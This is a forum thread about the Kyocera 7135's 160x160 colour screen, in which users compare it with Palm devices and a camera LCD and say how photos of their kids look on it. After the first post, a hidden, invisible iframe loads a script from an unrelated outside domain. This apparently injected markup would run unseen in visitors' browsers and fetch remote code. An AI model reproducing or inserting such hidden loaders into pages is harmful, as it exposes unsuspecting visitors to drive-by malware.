    7135 screen rez

Does anyone know what the 7135's screen resolution is? I want to compare it to the new Palm Zire 71. Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

So the 7135's screen isn't as good as the Zire's? Too bad. Thanks for the quick response.

Good isn't only a factor of resolution (number of pixels). The smaller screen size on the 7135 packs the pixels closer together which makes for a clearer image, especially for text. Also, brightness is an important factor. I haven't looked at the Zire, but everyone who has worked with the 7135 is VERY impressed with the screen display.

Yes, the screen on the 7135 is very impressive despite its resolution and smaller size. I'm comparing it side-by-side with my old Palm IIIc as I type this. I can definitely say that I like the 7135 screen much better!

I want to use it to display photos of my kids, I have a Prism now and they look like there's a screen in front of them. Does anyone have pics on their 7135 and if so, how do they look?

I whipped out my 7135 to show one of my friends, and he brought out his Palm V to compare. That thing is huge!

I keep photos of my kids on the 7135 and they look great. (Yes, both the photos and the kids.)

160x160 and 65,000 colors. Pictures don't look pixelated.

Obviously 320x320 will look better, but considering it is 160x160, it looks very good.

640 by 480 would be nice too, but a bit tough to carry. It would be even tougher to read if they dropped to 300 pixels / inch!

I think pictures look great on the 7135... the display is very sharp and the richness of the color put my Treo to shame

I'm curious as to why my digital camera's (Canon S230) LCD screen looks so much better than the 7135's with photos??

The camera's LCD looks so much sharper and more vivid.
